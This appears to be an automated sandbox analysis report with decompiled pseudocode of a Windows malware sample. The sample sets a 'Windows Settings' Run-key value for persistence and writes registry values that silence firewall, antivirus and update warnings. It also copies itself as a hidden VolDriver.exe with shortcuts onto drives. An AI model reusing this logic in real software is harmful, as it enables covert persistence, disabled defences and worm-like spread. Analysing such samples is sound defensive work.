                                                                                                                                                                                                                                                                  0x00405ccb
                                                                                                                                                                                                                                                                  0x00405ccb
                                                                                                                                                                                                                                                                  0x00405ce2
                                                                                                                                                                                                                                                                  0x00405ce8
                                                                                                                                                                                                                                                                  0x00405cf5
                                                                                                                                                                                                                                                                  0x00405f5e
                                                                                                                                                                                                                                                                  0x00405f63
                                                                                                                                                                                                                                                                  0x00405f89
                                                                                                                                                                                                                                                                  0x00405fa8
                                                                                                                                                                                                                                                                  0x00405fc7
                                                                                                                                                                                                                                                                  0x00405fe6
                                                                                                                                                                                                                                                                  0x00406005
                                                                                                                                                                                                                                                                  0x00406024
                                                                                                                                                                                                                                                                  0x00406043
                                                                                                                                                                                                                                                                  0x00406062
                                                                                                                                                                                                                                                                  0x0040606f
                                                                                                                                                                                                                                                                  0x0040606f
                                                                                                                                                                                                                                                                  0x00406095
                                                                                                                                                                                                                                                                  0x004060b4
                                                                                                                                                                                                                                                                  0x004060d3
                                                                                                                                                                                                                                                                  0x004060f2
                                                                                                                                                                                                                                                                  0x00406111
                                                                                                                                                                                                                                                                  0x00406130
                                                                                                                                                                                                                                                                  0x0040614f
                                                                                                                                                                                                                                                                  0x0040616e
                                                                                                                                                                                                                                                                  0x0040617b
                                                                                                                                                                                                                                                                  0x0040617b
                                                                                                                                                                                                                                                                  0x00406186
                                                                                                                                                                                                                                                                  0x00406196
                                                                                                                                                                                                                                                                  0x004061a8
                                                                                                                                                                                                                                                                  0x004061bf
                                                                                                                                                                                                                                                                  0x004061d9
                                                                                                                                                                                                                                                                  0x004061f1
                                                                                                                                                                                                                                                                  0x004061fc
                                                                                                                                                                                                                                                                  0x00406211
                                                                                                                                                                                                                                                                  0x0040621c
                                                                                                                                                                                                                                                                  0x00406231
                                                                                                                                                                                                                                                                  0x0040623c
                                                                                                                                                                                                                                                                  0x00406242
                                                                                                                                                                                                                                                                  0x0040624c
                                                                                                                                                                                                                                                                  0x0040625f
                                                                                                                                                                                                                                                                  0x00406269
                                                                                                                                                                                                                                                                  0x00406273
                                                                                                                                                                                                                                                                  0x00406278
                                                                                                                                                                                                                                                                  0x00406291
                                                                                                                                                                                                                                                                  0x004062ac
                                                                                                                                                                                                                                                                  0x004062c8
                                                                                                                                                                                                                                                                  0x004062e4
                                                                                                                                                                                                                                                                  0x004062e9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004062f0
                                                                                                                                                                                                                                                                  0x00405cfb
                                                                                                                                                                                                                                                                  0x00405d06
                                                                                                                                                                                                                                                                  0x00405d21
                                                                                                                                                                                                                                                                  0x00405d3f
                                                                                                                                                                                                                                                                  0x00405d45
                                                                                                                                                                                                                                                                  0x00405d56
                                                                                                                                                                                                                                                                  0x00405d5e
                                                                                                                                                                                                                                                                  0x00405e3d
                                                                                                                                                                                                                                                                  0x00405e42
                                                                                                                                                                                                                                                                  0x00405e60
                                                                                                                                                                                                                                                                  0x00405e66
                                                                                                                                                                                                                                                                  0x00405e7f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405e8e
                                                                                                                                                                                                                                                                  0x00405eb4
                                                                                                                                                                                                                                                                  0x00405f3f
                                                                                                                                                                                                                                                                  0x00405f46
                                                                                                                                                                                                                                                                  0x00405f4b
                                                                                                                                                                                                                                                                  0x00405f54
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405f58
                                                                                                                                                                                                                                                                  0x00405f58
                                                                                                                                                                                                                                                                  0x00405ec0
                                                                                                                                                                                                                                                                  0x00405ecf
                                                                                                                                                                                                                                                                  0x00405ed5
                                                                                                                                                                                                                                                                  0x00405ede
                                                                                                                                                                                                                                                                  0x00405ee5
                                                                                                                                                                                                                                                                  0x00405eec
                                                                                                                                                                                                                                                                  0x00405f04
                                                                                                                                                                                                                                                                  0x00405f2c
                                                                                                                                                                                                                                                                  0x00405f39
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405f39
                                                                                                                                                                                                                                                                  0x00405d6d
                                                                                                                                                                                                                                                                  0x00405d8b
                                                                                                                                                                                                                                                                  0x00405d93
                                                                                                                                                                                                                                                                  0x00405e1e
                                                                                                                                                                                                                                                                  0x00405e25
                                                                                                                                                                                                                                                                  0x00405e2a
                                                                                                                                                                                                                                                                  0x00405e33
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405e37
                                                                                                                                                                                                                                                                  0x00405e37
                                                                                                                                                                                                                                                                  0x00405d9f
                                                                                                                                                                                                                                                                  0x00405dae
                                                                                                                                                                                                                                                                  0x00405db4
                                                                                                                                                                                                                                                                  0x00405dbd
                                                                                                                                                                                                                                                                  0x00405dc4
                                                                                                                                                                                                                                                                  0x00405dcb
                                                                                                                                                                                                                                                                  0x00405de3
                                                                                                                                                                                                                                                                  0x00405e0b
                                                                                                                                                                                                                                                                  0x00405e18
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405e18
                                                                                                                                                                                                                                                                  0x00405d0a
                                                                                                                                                                                                                                                                  0x00405d0a
                                                                                                                                                                                                                                                                  0x00405c96
                                                                                                                                                                                                                                                                  0x00405c9c
                                                                                                                                                                                                                                                                  0x00405ca0
                                                                                                                                                                                                                                                                  0x00405ca7
                                                                                                                                                                                                                                                                  0x00405cb1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405cb3
                                                                                                                                                                                                                                                                  0x00405cba
                                                                                                                                                                                                                                                                  0x00405cc9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405cc9
                                                                                                                                                                                                                                                                  0x00405cd7
                                                                                                                                                                                                                                                                  0x00405cd9
                                                                                                                                                                                                                                                                  0x00405cdc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405cdc
                                                                                                                                                                                                                                                                  0x00405be0

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 00405B4E
                                                                                                                                                                                                                                                                  • PathFileExistsW.KERNELBASE(2596396235629365635), ref: 00405B7B
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(246266396537), ref: 00405B8A
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(2352338747374), ref: 00405B95
                                                                                                                                                                                                                                                                  • MoveFileA.KERNEL32 ref: 00405BA5
                                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,5858874), ref: 00405BC5
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405BD1
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00405BE0
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00413590,00000105), ref: 00405C06
                                                                                                                                                                                                                                                                  • PathFindFileNameW.SHLWAPI(00413590), ref: 00405C11
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00405C2E
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?), ref: 00405C3E
                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00405C55
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00405D0A
                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000104), ref: 00405D21
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00405D3F
                                                                                                                                                                                                                                                                  • CopyFileW.KERNELBASE(00413590,?,00000000), ref: 00405D56
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,00000003), ref: 00405D6D
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 00405D8B
                                                                                                                                                                                                                                                                  • RegSetValueExW.KERNELBASE(00000000,Windows Settings,00000000,00000001,?,?), ref: 00405E0B
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00405E18
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00405E37
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00405E42
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00405E60
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00413590,?,00000000), ref: 00405E77
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 00405E8E
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 00405EAC
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 00405F2C
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00405F39
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00405F58
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00405F63
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,00000000), ref: 00405F81
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 00405FA8
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 00405FC7
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00405FE6
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406005
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406024
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406043
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406062
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040606F
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center\Svc,00000000,00020006,00000000), ref: 0040608D
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004060B4
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004060D3
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 004060F2
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406111
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406130
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 0040614F
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 0040616E
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040617B
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406186
                                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 004061A8
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004061BF
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004061D9
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 004061F1
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 004061FC
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 00406211
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040621C
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 00406231
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 0040623C
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406259
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$File$Sleep$Createwsprintf$CloseExitOpenProcess$DeleteThread$AttributesCopyEnvironmentExpandNamePathStrings$ErrorEventExistsFindLastModuleMoveMutexStartup
                                                                                                                                                                                                                                                                  • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tbcmds.dat$%s\tbnds.dat$%userprofile%$%windir%$2346836423674$2352338747374$246266396537$2596396235629365635$2959359672365276$5858874$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$sysfevcs.exe$+A
                                                                                                                                                                                                                                                                  • API String ID: 2159060516-4122399374
                                                                                                                                                                                                                                                                  • Opcode ID: 4088cd72618efd9e4641f931d760f2fd9e9ec53dbf7a603da10e25e34ee59f31
                                                                                                                                                                                                                                                                  • Instruction ID: 92e1a68c9bc006c386a89a388cf1530c15af291c072a27ad18b719b30f1901aa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4088cd72618efd9e4641f931d760f2fd9e9ec53dbf7a603da10e25e34ee59f31
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2123EB1A80318ABE7309B50DD4AF997778EB44B04F5081B5F309BA1D1D7B46A84CF5D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 68 40d0b0-40d10e memset CreateProcessW 69 40d110-40d11d Sleep 68->69 70 40d11f-40d143 ShellExecuteW 68->70 71 40d156-40d159 69->71 72 40d154 70->72 73 40d145-40d152 Sleep 70->73 72->71 73->71
                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040D0B0(char _a4) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                  				struct _STARTUPINFOW _v100;
                                                                                                                                                                                                                                                                  				intOrPtr _v104;
                                                                                                                                                                                                                                                                  				int _t20;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				memset( &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                  				_v24.hProcess = 0;
                                                                                                                                                                                                                                                                  				_v24.hThread = 0;
                                                                                                                                                                                                                                                                  				_v24.dwProcessId = 0;
                                                                                                                                                                                                                                                                  				_v24.dwThreadId = 0;
                                                                                                                                                                                                                                                                  				_v100.cb = 0x44;
                                                                                                                                                                                                                                                                  				_v100.dwFlags = 1;
                                                                                                                                                                                                                                                                  				_v100.wShowWindow = 5;
                                                                                                                                                                                                                                                                  				_t11 =  &_a4; // 0x405f4b
                                                                                                                                                                                                                                                                  				_t20 = CreateProcessW(0,  *_t11, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24); // executed
                                                                                                                                                                                                                                                                  				if(_t20 != 1) {
                                                                                                                                                                                                                                                                  					_t12 =  &_a4; // 0x405f4b
                                                                                                                                                                                                                                                                  					_v8 = ShellExecuteW(0, L"open",  *_t12, 0, 0, 0);
                                                                                                                                                                                                                                                                  					_v104 = _v8;
                                                                                                                                                                                                                                                                  					if(_v104 <= 0x20) {
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					Sleep(0x3e8);
                                                                                                                                                                                                                                                                  					return 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                  				return 1;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x0040d0be
                                                                                                                                                                                                                                                                  0x0040d0c8
                                                                                                                                                                                                                                                                  0x0040d0cb
                                                                                                                                                                                                                                                                  0x0040d0ce
                                                                                                                                                                                                                                                                  0x0040d0d1
                                                                                                                                                                                                                                                                  0x0040d0d4
                                                                                                                                                                                                                                                                  0x0040d0db
                                                                                                                                                                                                                                                                  0x0040d0e7
                                                                                                                                                                                                                                                                  0x0040d0ff
                                                                                                                                                                                                                                                                  0x0040d105
                                                                                                                                                                                                                                                                  0x0040d10e
                                                                                                                                                                                                                                                                  0x0040d125
                                                                                                                                                                                                                                                                  0x0040d136
                                                                                                                                                                                                                                                                  0x0040d13c
                                                                                                                                                                                                                                                                  0x0040d143
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d154
                                                                                                                                                                                                                                                                  0x0040d14a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d150
                                                                                                                                                                                                                                                                  0x0040d115
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.NTDLL ref: 0040D0BE
                                                                                                                                                                                                                                                                  • CreateProcessW.KERNELBASE ref: 0040D105
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000003E8), ref: 0040D115
                                                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,K_@,00000000,00000000,00000000), ref: 0040D130
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D14A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleep$CreateExecuteProcessShellmemset
                                                                                                                                                                                                                                                                  • String ID: $D$K_@$open
                                                                                                                                                                                                                                                                  • API String ID: 2222793131-44698946
                                                                                                                                                                                                                                                                  • Opcode ID: 6067ea38031c6e29b4dcc7b44fd310710b4567a6e9dad4b403b401856a848b2f
                                                                                                                                                                                                                                                                  • Instruction ID: 5b9e7ff7f959b24c41b671f48102102a5a22ad29d8e5895e5d8be873d8d12d20
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6067ea38031c6e29b4dcc7b44fd310710b4567a6e9dad4b403b401856a848b2f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D111FE71E44308EBEB14DF94DD46B9E7774AB44B00F20413AF609BA2C1D6B55A04CB59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 85 404cf0-404d05 _chkstk 86 404d07-404d09 85->86 87 404d0e-404dc0 wsprintfW * 5 PathFileExistsW 85->87 88 4051c5-4051c8 86->88 89 404dc2-404de3 call 40cea0 87->89 90 404e04-404e13 PathFileExistsW 87->90 89->90 101 404de5-404dfe SetFileAttributesW DeleteFileW 89->101 92 404e80-404e8f PathFileExistsW 90->92 93 404e15-404e24 PathFileExistsW 90->93 94 404e91-404e97 92->94 95 404ed6-404ef7 FindFirstFileW 92->95 97 404e26-404e37 CreateDirectoryW 93->97 98 404e48-404e57 PathFileExistsW 93->98 99 404eb1-404ec4 call 404aa0 94->99 100 404e99-404eaf call 404aa0 94->100 102 404efd-404fb5 95->102 103 4051bf 95->103 97->98 104 404e39-404e42 SetFileAttributesW 97->104 98->92 105 404e59-404e6f CopyFileW 98->105 114 404ec7-404ed0 SetFileAttributesW 99->114 100->114 101->90 109 404fbf-404fd3 lstrcmpW 102->109 103->88 104->98 105->92 106 404e71-404e7a SetFileAttributesW 105->106 106->92 112 404fd5-404fe9 lstrcmpW 109->112 113 404feb 109->113 112->113 115 404ff0-405001 112->115 116 405196-4051ac FindNextFileW 113->116 114->95 117 405012-405019 115->117 118 405003-40500c 115->118 116->109 119 4051b2-4051b9 FindClose 116->119 120 405047-405050 117->120 121 40501b-405038 lstrcmpiW 117->121 118->117 119->103 124 405052 120->124 125 405057-405068 120->125 122 40503a 121->122 123 40503c-405043 121->123 122->118 123->120 124->116 126 405079-405080 125->126 127 40506a-405073 125->127 128 4050f0-4050f9 126->128 129 405082-40509f PathMatchSpecW 126->129 127->126 132 405100-40510f PathFileExistsW 128->132 133 4050fb 128->133 130 4050a1 129->130 131 4050a3-4050e9 wsprintfW SetFileAttributesW DeleteFileW 129->131 130->127 131->128 134 405111 132->134 135 405116-405166 wsprintfW * 2 132->135 133->116 134->116 136 405180-405190 MoveFileExW 135->136 137 405168-40517e call 404bb0 135->137 136->116 137->116
                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404CF0(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16) {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				short _v1044;
                                                                                                                                                                                                                                                                  				short _v1564;
                                                                                                                                                                                                                                                                  				short _v2084;
                                                                                                                                                                                                                                                                  				intOrPtr _v2088;
                                                                                                                                                                                                                                                                  				short _v2612;
                                                                                                                                                                                                                                                                  				short _v3132;
                                                                                                                                                                                                                                                                  				char _v3133;
                                                                                                                                                                                                                                                                  				struct _WIN32_FIND_DATAW _v3732;
                                                                                                                                                                                                                                                                  				short _v4252;
                                                                                                                                                                                                                                                                  				void* _v4256;
                                                                                                                                                                                                                                                                  				short _v4780;
                                                                                                                                                                                                                                                                  				intOrPtr _v4784;
                                                                                                                                                                                                                                                                  				WCHAR* _v4788;
                                                                                                                                                                                                                                                                  				WCHAR* _v4792;
                                                                                                                                                                                                                                                                  				WCHAR* _v4796;
                                                                                                                                                                                                                                                                  				WCHAR* _v4800;
                                                                                                                                                                                                                                                                  				WCHAR* _v4804;
                                                                                                                                                                                                                                                                  				intOrPtr _v4808;
                                                                                                                                                                                                                                                                  				WCHAR* _v4812;
                                                                                                                                                                                                                                                                  				WCHAR* _v4816;
                                                                                                                                                                                                                                                                  				WCHAR* _v4820;
                                                                                                                                                                                                                                                                  				WCHAR* _v4824;
                                                                                                                                                                                                                                                                  				WCHAR* _v4828;
                                                                                                                                                                                                                                                                  				WCHAR* _v4832;
                                                                                                                                                                                                                                                                  				WCHAR* _v4836;
                                                                                                                                                                                                                                                                  				WCHAR* _v4840;
                                                                                                                                                                                                                                                                  				WCHAR* _v4844;
                                                                                                                                                                                                                                                                  				WCHAR* _v4848;
                                                                                                                                                                                                                                                                  				WCHAR* _v4852;
                                                                                                                                                                                                                                                                  				WCHAR* _v4856;
                                                                                                                                                                                                                                                                  				WCHAR* _v4860;
                                                                                                                                                                                                                                                                  				signed char _v4861;
                                                                                                                                                                                                                                                                  				signed char _v4862;
                                                                                                                                                                                                                                                                  				signed int _v4868;
                                                                                                                                                                                                                                                                  				signed int _v4872;
                                                                                                                                                                                                                                                                  				intOrPtr _t167;
                                                                                                                                                                                                                                                                  				intOrPtr _t195;
                                                                                                                                                                                                                                                                  				void* _t218;
                                                                                                                                                                                                                                                                  				void* _t219;
                                                                                                                                                                                                                                                                  				void* _t224;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0040EB2A();
                                                                                                                                                                                                                                                                  				if((_a12 & 0x00080000) != 0) {
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v2088 = 0x412c2c;
                                                                                                                                                                                                                                                                  				_v3133 = 0;
                                                                                                                                                                                                                                                                  				wsprintfW( &_v1564, L"%s.lnk", _a8);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v4252, L"%s\\%s", _a4, _v2088);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v4780, L"%s\\%s\\VolDriver.exe", _a4, _v2088);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v2612, L"%s\\%s", _a4,  &_v1564);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v1044, L"%s\\*", _a4);
                                                                                                                                                                                                                                                                  				_t224 = _t219 + 0x48;
                                                                                                                                                                                                                                                                  				if(PathFileExistsW( &_v4780) != 0) {
                                                                                                                                                                                                                                                                  					_t167 = E0040CEA0( &_v4780);
                                                                                                                                                                                                                                                                  					_t224 = _t224 + 4;
                                                                                                                                                                                                                                                                  					_v4784 = _t167;
                                                                                                                                                                                                                                                                  					_t195 =  *0x412f70; // 0x0
                                                                                                                                                                                                                                                                  					if(_t195 != _v4784) {
                                                                                                                                                                                                                                                                  						SetFileAttributesW( &_v4780, 0x80);
                                                                                                                                                                                                                                                                  						DeleteFileW( &_v4780);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(PathFileExistsW( &_v4780) == 0) {
                                                                                                                                                                                                                                                                  					if(PathFileExistsW( &_v4252) == 0 && CreateDirectoryW( &_v4252, 0) != 0) {
                                                                                                                                                                                                                                                                  						SetFileAttributesW( &_v4252, 2);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(PathFileExistsW( &_v4252) != 0 && CopyFileW(0x412f78,  &_v4780, 0) != 0) {
                                                                                                                                                                                                                                                                  						SetFileAttributesW( &_v4780, 2);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(PathFileExistsW( &_v2612) == 0) {
                                                                                                                                                                                                                                                                  					if((_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  						E00404AA0( &_v2612, L"shell32.dll", 8);
                                                                                                                                                                                                                                                                  						_t224 = _t224 + 0xc;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						E00404AA0( &_v2612, L"shell32.dll", 9);
                                                                                                                                                                                                                                                                  						_t224 = _t224 + 0xc;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					SetFileAttributesW( &_v2612, 1);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v4256 = FindFirstFileW( &_v1044,  &_v3732);
                                                                                                                                                                                                                                                                  				if(_v4256 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					L45:
                                                                                                                                                                                                                                                                  					return _v3133;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v4860 = L"*.lnk";
                                                                                                                                                                                                                                                                  					_v4856 = L"*.vbs";
                                                                                                                                                                                                                                                                  					_v4852 = L"*.js";
                                                                                                                                                                                                                                                                  					_v4848 = L"*.scr";
                                                                                                                                                                                                                                                                  					_v4844 = L"*.com";
                                                                                                                                                                                                                                                                  					_v4840 = L"*.jse";
                                                                                                                                                                                                                                                                  					_v4836 = L"*.cmd";
                                                                                                                                                                                                                                                                  					_v4832 = L"*.pif";
                                                                                                                                                                                                                                                                  					_v4828 = L"*.jar";
